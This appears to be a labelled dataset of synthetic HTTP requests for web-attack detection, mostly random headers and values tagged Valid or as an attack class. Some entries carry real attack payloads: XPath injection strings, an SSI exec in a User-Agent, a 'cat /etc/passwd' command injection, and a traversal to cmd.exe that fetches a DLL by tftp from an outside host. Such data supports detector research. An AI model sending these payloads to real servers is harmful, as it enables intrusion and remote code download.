UA-OS: Win95
UA-Color: color32
UA-Pixels: 973x7584
Via: HTTP/9.1 236.4.175.107
Transfer-Encoding: xertb; cUrl2Ae=ahetlI
Upgrade: Nmotn/6.8, q7lyw3/3.8, lnmv/7.8, r3di3/6.0
Warning: 909 www.n8hewn.css "tEwe81aorN2bNEEtoee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23188
Start - Id: 23132
class: Valid
GET /tVub8uc/nMRtgy-/taotwL/oRs86vXdYV.aRMF/hApokMT/h0RnEwB0y7T/hEUOLediBZsSDawinnt/5qXSClYFQ/tEs0iVhuBGXu/rV.jsp? HTTP/1.0
Host: 54.122.95.113
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, windows-1258
Accept-Encoding: gzip, compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.184.188.213
Cookie: 8ecae=bJWtf2VD;eA=tc8sqeeEe1e;-6drop7lB82l7c.=nevX
Cookie2: $Version="20"
Date: Thu, 08 Dec 05 12:12:48 CET
ETag: W/"v1AosA9JttpO2KcNU"
Expect: kseno7lE=dU2ds;5eOtlDeH
From: xtisieil@oihdn.cz
If-Modified-Since: Thu, 19 Jul 07 06:24:07 GMT
If-Unmodified-Since: Thu, 01 Jun 06 16:13:26 CET
If-Match: *
If-None-Match: "7@7i4jbJUVFfFu7"
If-Range: Tue, 19 Oct 04 20:36:14 UTC
Max-Forwards: 9
MIME-Version: 4.7
Pragma: nn9wfxtr='yhcl'
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: NTLM ZW43b2p5OGRvZ0FpY2V0MWRhaWF2dXlraG5sY1hyaHVueWwxaGlyaGFmbQ==
Range: -515103
Referer: http://5ylqalub.biz/csthtpdi/7bMOev/e24rnee/nstd9n/fAei0noi.bin
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 8.8; an-Se; rv:5.6.4) Gecko/27112431
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 558x894
Via: 7.4 www.meovosti.tiff, 3.3 193.22.20.164, 5.2 www.do3r.jpg
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23132
Start - Id: 19933
class: Valid
GET /ac5WAXW/a4W7umdyrJ6/58_saccess_logQ.css?dtllyb6mTfi=92846&si1ijuae=anaxee6xxl&dahidhosa=dardiuedmtarra88b1&aI=alleiTf%2Bf3v&g6ffotqlxcdrlo=484&gezmedto=e&oumwr=753663&auqP=rn&eDpesi=%7EFe%3BaIgwiyE&eehoetuileehut=76875&JcOTCa=492&hinWc=nRyO3q%40&epeseo9urOa=bnHa&ncs6teef3ets=43939485 HTTP/1.0
Host: www.es5e55tddk.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.249.226.166
Cookie: i6=grsmcied;lewe=qwinnt;ooxi5=esbhqqe<b;raemceeI7Ee=m
Cookie2: $Version="3"
Date: Fri, 06 Apr 07 12:35:26 CET
ETag: W/"ile_Zdc_ZUvNFN1"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Sun, 02 May 10 14:08:15 GMT
If-Unmodified-Since: Tue, 12 Oct 04 13:38:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Oct 07 18:27:38 GMT
Max-Forwards: 10
MIME-Version: 1.1
Pragma: eEr5rtaL='he64n'
Proxy-Authorization: Digest cnonce="ocnn"
Authorization: Basic dGFvYzppbGd0
Range: -938127,36370-,-5
Referer: /cn22ryo.tar
TE: trailers,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: aljrelta (b175_texp; nIMEV@BZx; nyt5_Bpa_F; g1pTiI)
UA-CPU: Sparc
UA-Disp: 611,1277,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 756x2638
Via: 5.5 www.2tdSa.jpg, 3.3 www.etsaye.htm, 7.7 www.i2vxlT8.html
Transfer-Encoding: identity
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19933
Start - Id: 49540
class: XPathInjection
GET /ov2T5qhPBgvW4jmmh0/666Q.mspx?ciiaf=toe0oafgnsr&tSmnm9el=%40ut0%26kbodyobect%27%25K%26&Rcighe9traTT=34&OJ24_r=79&nw=54+++++or+++++hhtcni%2Fclo%2Fl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D843%5D+or+++70%3D&sinaQeu9nS=412&7vQOSHrXr8=etdTnedd%25&olabie=sGso HTTP/1.0
Host: www.nmrFse6ot.fr
Connection: close
Accept: */*
Accept-Charset: euc-tw, windows-874, iso-8859-3;q=0.2, x-mac-greek
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 74.98.44.206
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="3"
Date: Sun, 29 Jun 08 16:36:35 UTC
ETag: "bHghOmTBfDFajHx3kO"
Expect: edehn3bs=oglslt
From: wirtsy@nexe4eht.ch
If-Modified-Since: Sat, 12 Sep 09 23:09:10 CET
If-Unmodified-Since: Sat, 27 Jan 07 22:18:07 GMT
If-Match: "rpyAe0.Ry8G2ORlT3I"
If-None-Match: "6L70SZ3iZksBSyZ"
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 4860
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic ZHBtaXM3dDpoYTliYTU=
Range: -5,-835621,4-66
Referer: /7eddnle/nlm7t/e2h4n/n2eLiTm/tEqdol.jsp
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 0.6; ld-c8; rv:6.9.6) Gecko/23351202
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 750x884
Via: HTTP/8.6 26.176.68.18, 7.0 www.F19nna.css:0, lee/8.1 www.Diew.js
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 84222466016930
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49540
Start - Id: 36586
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.bneau6e.cz
Connection: 2iaho60
Accept: video/*, image/*;q=0.9
Accept-Charset: koi8;q=0.3, x-mac-korean;q=0.0, cp-950;q=0.6, macintosh
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: szv=gnqsnai
Client-ip: 76.108.144.255
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="05"
Date: Fri, 09 Jun 06 03:33:39 CET
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Fri, 16 Nov 07 12:48:50 CET
If-Match: "sjzbDPggXqFv7mTRp"
If-None-Match: "U8jhXuzH.@IoHUz9Vl"
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 150
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: -5
Referer: /scfttlw/eteua1.js
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: mO8H-flr@ http://www.ts6yNk.biz
UA-CPU: MIPS
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/3.4 63.108.104.73
Transfer-Encoding: 1iuif
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 35669547632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36586
Start - Id: 49323
class: XPathInjection
GET /hleinfyclaOasdpool3s/hmptwKpuku/NP.x/AKofX4G1ePkqlY/a9_0lZvqTeV0G/0it1acaEnsnasDaHsmig/ehTBA7cgHB.c/dwe/omBntzieq4uee/aesrIeiogo6Fe1asiA/eZild8F@jN.html?ia=lihnAh&Ruyh=Jh&HRlformdpyZ=9589&Oz=tet&dOSsbqbgl4t=m7FLT6w&usminhu=cieii&sfIcen=8SSEp2OXplf&dnoe9nbsahu=re%27+or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i+++%2Bj+%2B+++k+++%2Bl+%2B1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+%27Eo%27+%3D+++%27+++E6Eiated%27++++or HTTP/1.0
Host: www.sltsduesrs.org
Connection: keep-alive
Accept: text/*, image/*;q=0.1
Accept-Charset: x-mac-arabic
Accept-Encoding: compress;q=0.5, compress;q=0.9, compress;q=0.5, gzip;q=0.5
Accept-Language: o7eiIeO-psDxc;q=0.8, nh5le0i-uqs;q=0.3, loeI-lAvUs, nc-c;q=0.0, 5uiobea-nDbtb
Cache-Control: max-age=66551
Client-ip: 66.86.201.155
Cookie: snmgdejssqmo=nRRSQ4;omreheJulvn=eisqxegrrhppoo4;oIaidaomy=ti? ao  eoaeelenipd
Cookie2: $Version="4"
Date: Tue, 13 Feb 07 22:51:52 GMT
ETag: "BoY2OwHYJAF2CRWj"
Expect: dIehaWe=esyeo;tx6ezea=Ee5h3s2
From: tailcrn@aoedhlvnA.it
If-Modified-Since: Thu, 27 Apr 06 03:51:46 GMT
If-Unmodified-Since: Thu, 27 Jul 06 08:01:54 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 5809
MIME-Version: 6.3
Pragma: ele='htro'
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Basic c29pZTplbHRxcmVN
Range: 28823-,87212-
Referer: http://www.aNn8.ch/iefi9a/bBtlaeh/ednB/teoopie.avi
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: mYK3PUIC http://www.rinoa.com
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49323
Start - Id: 39144
class: SSI
GET /L0zoY8iUqjNK/nkeapVr7t-G/nmeaqpualseue/ufou/Y3NwPsock_stream7OSRN/idt1o/Tsclnt.asmx?mtlRdiglorKN=RifodtvarTt0&Geiagnt0vo1wowe=vtn&gnaht=Gx&huIoCdha=+hilfeTee9S&e5oaejxeiltir=y&oeIosrytems=i4eesen-in&eua=c+bin HTTP/1.1
Host: www.7ikDny0tT.biz:1
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: t5a-jnz, n0dtssn-tnrbun;q=0.0
Cache-Control: no-transform
Client-ip: 6.226.198.132
Cookie2: $Version="0"
Date: Tue, 20 Jan 09 13:53:46 GMT
Expect: n8Emgv7
If-Modified-Since: Sun, 09 Jul 06 02:30:31 UTC
If-Unmodified-Since: Tue, 22 Feb 05 16:24:18 UTC
If-None-Match: "k.Lvb.3nOXLr-iy6juh"
Max-Forwards: 03
MIME-Version: 8.2
Authorization: Basic aHJybXRhOnRyZTdF
Referer: http://wrbYi.com/eUrmt3i/kn2ry/et08.js
Trailer: Via
User-Agent: <!--#exec cgi="/cgi-bin/script?puNt3"   -->
Upgrade: jatys/1.4, a9i/0.1
----: -------------------------------------------------

null

End - Id: 39144
Start - Id: 24185
class: Valid
GET /e0mluy.php3?Hu93tHXDz=n_LBPo_&a8ol2rttodsers=tvntgesGi&TCeAA8fKhAtmpo=s+%3Cwhfromaaaccess_logo2oteeaS+is&w2igouu=r7ns&e0xFMO=tbmyexec HTTP/1.1
Host: 118.172.169.209:80
Connection: 6HcOu
Accept: text/*, video/*, audio/x-wav;q=0.8
Accept-Charset: x-mac-korean, x-mac-arabic, koi8, windows-874
Accept-Encoding: deflate;q=0.7, deflate, compress
Accept-Language: *;q=0.9
Cache-Control: max-age=34209
Client-ip: 240.233.81.94
Cookie: an0Sa6=kM5;rlxoioau=837873330
Cookie2: $Version="96"
Date: Wed, 28 Jun 06 13:50:50 UTC
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: ayael@sasgerntqn.it
If-Modified-Since: Wed, 28 Sep 05 06:46:55 CET
If-Unmodified-Since: Sat, 25 Apr 09 02:09:05 UTC
If-Match: "8tqG-kRqSvgr.bNMXTt"
If-None-Match: "NbrhaBhf1ATLsUpa"
If-Range: Sun, 23 Aug 09 16:52:37 GMT
Max-Forwards: 31
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: /TEfont/recit/wonBo/hudcodt/bto8.pdf
TE: trailers,gzip
Trailer: Upgrade
User-Agent: iwnhh5t (bqUe6kP.)
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: deflate
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 172.198.248.143
X-Serial-Number: 742584885345002527
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24185
Start - Id: 35512
class: XPathInjection
GET /tloac4ruatNie.bin?u5ameifcttenek=iVRnVEtg&4eOHhRooqeE=gnnisysrmu5iiEaqbb&aesu=jqe&0neai8irsNHasmu=ajrwamfrt0Hude1s&05wnfoynbzoiYb=Yfie2ErItltip&sifun=hef1smocha+selectn%3B%5Bbgi4en HTTP/1.1
Host: www.cjikiqn4H.st
Connection: close
Accept: application/*, text/*
Accept-Charset: windows-1257, x-mac-cyrillic;q=0.3, us-ascii, x-mac-turkish;q=0.0
Accept-Language: *;q=0.1
Cookie: pselectO@rcoJLs1=k_bUjQHk4OIY;xactrsyeweart0=sUK6pnymh;iaelsliqsotoHl=o9aw2eDe;n5jcpe7g=diOA' or  count(path/child::node()[position(  )=((   i    +   j +   k  +    l    +    1)]  |     path/child::*()[position()=(k+1)])=1    or    'NerusenR'  =  '   enuNn'     or
Date: Sat, 27 Dec 08 04:41:51 CET
From: inme2@iaidaa.net
If-Modified-Since: Wed, 11 Aug 04 08:32:22 CET
Pragma: no-cache
Referer: /9rrEW1aw/eV7suw/mdMr3yce/rccoef.swf
User-Agent: a9iLeesbgSSior8d0me
Transfer-Encoding: deflate
Upgrade: k9htty/6.1

null

End - Id: 35512
Start - Id: 48987
class: XPathInjection
GET /p5D.U3foWM/ngic6S03/otxNrmeajttOr5h9e9/2Ttrttpjjwrrtbianoes/oOfS/0yfwNrlIOUs7zCKfbf/si9331ZbJCe.6SiBt/D7l.shtml?sgphEyhh=eVlu&1tfpep=nt%27+++++or++++%28i++++%3C++count%28en%2Fchild%3A%3Atext%28%29%29+++and+++j+%3C+count%28d0%2Fchild%3A%3Acomment%28%29%29+and+++k++++%3C++++count%28rre%2Fchild%3A%3A*%29+++++%29+++or++++%27ueafeAiz%27+%3D+%27++r6ieinl%27++or&qDaKx6UXdivy=ed1.1&-0HPAt=3950482798&oohwym50nse=eomfeclneAfqFRsa&aevhalra=dte%25scixp_cienauped&njneTtce2Eoofr=navybc&Rwssea=0aIs7radminaoseuperli&hc3e2GN5r8nnrE=aldpilinkh&wycn.bPHIP-0=09211&jApiplae=165413&tguwsOlTt=usn HTTP/1.0
Host: www.zeocdb1.fr
Connection: close
Accept: text/*, application/postscript
Accept-Charset: cp-950;q=0.8, euc-kr;q=0.1, x-mac-roman, big5
Accept-Encoding: compress;q=0.5, gzip;q=0.8, identity;q=0.4, deflate;q=0.9, deflate
Accept-Language: iiiscs-z, Rla-osamf;q=0.0, 4iq9fi5A-st, ateqidrm-eOcii;q=0.6
Cache-Control: no-cache
Client-ip: 102.111.118.138
Cookie: qvPCG=5NuGP;usrNDlGgKD=tlCF_SBw6mG;dsaourj=886;6t4Tooleatrih=21187796;ecam=std+;0oEf9a9wnQsH3ar=lee-
Cookie2: $Version="7"
Date: Sun, 03 Jan 10 17:42:49 GMT
ETag: "SIuC_mG3.D_K.LlO5Dn"
Expect: ochaoiy
From: fnifizo6@nrorEd.cz
If-Modified-Since: Fri, 18 May 07 03:44:44 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: "c62ajvcSohKIY-a0"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: *
Max-Forwards: 802
MIME-Version: 7.4
Pragma: Qi='eitIu'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest realm
Range: 23-,057-,45-
Referer: /efKsnoht/Itee/L97lbse.pdf
TE: trailers,trailers,gzip;q=0.9
Trailer: From
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 6.7; ie-uS; rv:4.4.1) Gecko/55044766
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8171x6640
Via: HTTP/2.4 www.envefiot.tiff, 2.1 www.r7chanr.jpg
Transfer-Encoding: gzip
Upgrade: aivsar/6.5, Aensn/2.2
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48987
Start - Id: 33466
class: Valid
POST /6gh5lT/v9_IDA9dW2_CJI_u19/2tIir.aspx? HTTP/1.0
Content-Length: 146
Content-Language: yhSety
Content-Encoding: gzip
Content-Location: http://www.OalY.gov/ucwe/nidvry.php
Content-MD5: bnkyaDMxZWFsaGw1bmFvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 08:38:10 GMT
Last-Modified: Sun, 10 Jan 10 11:40:19 CET
Host: 85.35.21.75:80
Connection: tmoei
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.5, x-mac-turkish;q=0.2, euc-jp, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 88.3.221.168
Cookie: l1mteecczb=O-d;i4usni=801294483;YDUO=jvIe~dot>hLm7we;Gcn=75250493
Cookie2: $Version="672"
Date: Mon, 08 Dec 08 16:05:00 UTC
ETag: W/"kqgRUjLAqmtR48Fe"
Expect: sabIt=etatnae;Aeesoun=3lr2Eo
From: arra@bopdn.biz
If-Modified-Since: Wed, 12 Aug 09 01:40:07 CET
If-Unmodified-Since: Thu, 05 Aug 04 17:37:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Mar 08 14:19:20 GMT
Max-Forwards: 774
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bnNvdXMyZTZucm9kZzJuZTR3RUhvaXNhbmpuY3Nuc28ybWxlbw==
Authorization: aiwms tymTl=uteo
Range: 02748-,068714-
Referer: /ann6/Iess.php3
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: eZ5Gq5pGN2 http://www.srn3.be
UA-CPU: MIPS
UA-Disp: 2518,5185,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4154x581
Via: nbnaie/7.1 www.lf9cse.htm
Transfer-Encoding: deflate
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nbssifxaE=rV1oz6rDz5ae&ns7=aMbdQyT.RfX5&.CscriptYV2raJlid=rafleah&idtpa=aaexecgI@tjyyRF&nlsaeuuEbjn=o%xr&uin2jowGeW= scripth6&>4]otA Fa0

End - Id: 33466
Start - Id: 49220
class: XPathInjection
GET /BVZCe@yPlsC_u/W6eTnp/8doo3gouopeh/trw/nugsRqnro/2u0hwc4prwtole/kCgbXtPF3U3k/xtthAeowoi.cfm?bldtaNuomu=Tx+z%2BiH+t4ytoee&ip=96516697&pytraapmT=87&9.V5imgTPk=41&igroup byBRynode.@=n3ur4J.X&4oo9PssNo=snn%27++++or++++6+++%3C++count%28path%2Fchild%3A%3A*%29+or+++%27et%27+%3D++++%27 HTTP/1.1
Host: www.tertTg.be
Connection: keep-alive
Accept: image/jpeg;q=0.4, application/*
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: niearc-ojhAibc3;q=0.7
Cache-Control: no-cache
Client-ip: 22.111.61.54
Cookie: KsiRT=eibsm;jayag=47618;A38m-eMlG=ec;hA6nieshR=earf;erhs=cabutsrb
Cookie2: $Version="95"
Date: Sat, 23 Jan 10 05:15:34 UTC
ETag: W/"wAUDMUpn_TbvD5aG66"
Expect: 100-continue
From: 92fxf@rrjet00.biz
If-Modified-Since: Thu, 23 Sep 04 21:10:53 CET
If-Unmodified-Since: Fri, 03 Oct 08 09:10:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Nov 09 17:33:55 CET
Max-Forwards: 3969
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: NTLM NldvSWhnaGRJaXNuMTNtZ2VvMzdzb2xhdG5tZnJ1cnRwbGxleG9haWlTemx0
Range: -392691
Referer: /ocne7/9ohto/riEhlirb/ana9wms.tar.gz
TE: trailers
Trailer: TE
User-Agent: nunu (vYpTH_t)
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6245x946
Via: 8.5 66.12.191.99
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49220
Start - Id: 24353
class: Valid
GET /tk7a566_VZu_@.-/df/lNacUaNePcrab/cR_.vvbqe87HRcu/rp3R1rApwo-v/eC40xpoVs3Wpt5_/sai/aEdHSkNe-QR/qavh2uy/sc.tiff?dAqhfNB9ps=67&laca1=+hiiacceptsp%28gusae4&2MWdivd1fED=874 HTTP/1.0
Host: www.ehqsLi1zwy.ch
Connection: keep-alive
Accept: application/zip;q=0.6, application/postscript, application/*
Accept-Charset: iso-8859-6;q=0.4, isiri-3342;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=5
Client-ip: 114.108.65.238
Cookie: ioysad7nh=yh;s4yb=libos~eu;CTtoeeit9l8i=mOlfiorCiaeehoo;Ten9eeoha=%nt6;let6hnottthe=411060
Cookie2: $Version="7"
Date: Thu, 19 Nov 09 22:06:18 CET
ETag: W/"sv4X_A-raIUd8Q5Y"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Mon, 13 Oct 08 19:01:16 UTC
If-Unmodified-Since: Tue, 21 Aug 07 14:53:49 CET
If-Match: "RuNHC@wzTGCZV_n88"
If-None-Match: *
If-Range: Sun, 28 Mar 10 20:11:59 UTC
Max-Forwards: 148
MIME-Version: 5.2
Pragma: RahasOc='puls7ih'
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM dU9yMWRmeDB3dGV0MHNSd2JsRGR0aTJodklvRWVubzduZw==
Range: -290,922508-,-602
Referer: /gxCmrs/isoiRies.conf
TE: trailers
Trailer: User-Agent
User-Agent: y-_jGp7wpz http://www.ay5wrt.cz
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: HTTP/6.8 www.srrnEan.png, Igtda/2.3 117.136.56.119:8, FTP/9.0 www.eikh.htm
Transfer-Encoding: identity
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24353
Start - Id: 44540
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: 90.86.229.159
Connection: keep-alive
Accept: audio/x-wav;q=0.4, video/mpeg
Accept-Charset: iso-10646-ucs-2, windows-1253, x-mac-hebrew, iso-8859-9;q=0.0, cp-950
Accept-Encoding: identity, identity
Accept-Language: *;q=0.8
Cache-Control: min-fresh=96
Client-ip: 15.83.253.70
Cookie: a2wbk4cn=ii2nle5yoevlb;-8wfE9Dk=nst
Date: Mon, 11 Dec 06 02:23:45 CET
ETag: "jkPmPul2szt6mLKeLP"
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-None-Match: *
If-Range: "_ed4eX@qdLdBt8K"
Max-Forwards: 9
MIME-Version: 5.2
Pragma: hse=r
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic ckxodDpzbUVu
Range: 07390-,-851404
Referer: http://iua5.it/eryisr.jsp
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: roidlVe2lSepcNytye
UA-Pixels: 069x3705
Via: 0.1 24.160.163.125, 9.9 www.gsm2hr.jpeg:5, 7.4 www.oquLdi.tiff:18
Transfer-Encoding: deflate
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44540
Start - Id: 15928
class: Valid
GET /n2C8@PI9UN0Q/xeon/g%u@G/o47iPNohnsjw6VLTA/b7@E6N/oA.php4?iitroeuiobtou=1525&oOssdoeooo8e=96&Humiuh5yog0ne=1729326&ecitdMte=s3h&sbtr7hsmefy0e=qd&ebttcfdp=s5ucdlZhlsjai4pjo&asn3MI=tK%40bMrSLz&ndolljwi4sgvi=30&aae4p=%3Fsight3t%5Cy6y+n&y7ta=epii HTTP/1.0
Host: 193.178.226.116
Connection: close
Accept: image/gif, video/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: ansemtS-csTopabw, wrLt1e-udIupxfi;q=0.9, oao5Snb-tfra4, tewct2im-Eetep;q=0.0, t-untu
Cache-Control: sii2nB7='uni'
Client-ip: 242.98.59.246
Cookie: fdeletehQ=ien;8xQI3=3951;7wgetP0KpRYTwUn=5
Cookie2: $Version="571"
Date: Wed, 19 Aug 09 06:21:53 CET
ETag: W/"6lmeDDX28RNXsYiHM52"
Expect: 100-continue
From: 7Am9i@jeexcst4.it
If-Modified-Since: Fri, 06 Nov 09 03:50:34 GMT
If-Unmodified-Since: Thu, 26 Aug 04 21:41:26 CET
If-Match: *
If-None-Match: *
If-Range: "4eQWf6hW8u6GN-SyMTi"
Max-Forwards: 16
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest realm
Range: -08,0744-,-43437
Referer: /lanc/gpre/liyeio/gn5phnrh.css
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 5.3; zf-sr; rv:0.2.6) Gecko/55466878
UA-CPU: x86
UA-Disp: 9960,6267,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7490x6757
Via: 6.5 137.85.90.55, 1.5 32.83.104.84, 8.7 202.111.233.57:3
Transfer-Encoding: identity
Upgrade: otrq/6.0, doyu/0.7, risbrn/5.4, noosNE/3.1, tej/4.1
Warning: 995 53.244.110.121:7 "1r8eHzltlemAerit5" "Sun, 28 Feb 10 23:52:29 CET"
X-Forwarded-For: 34.10.5.61
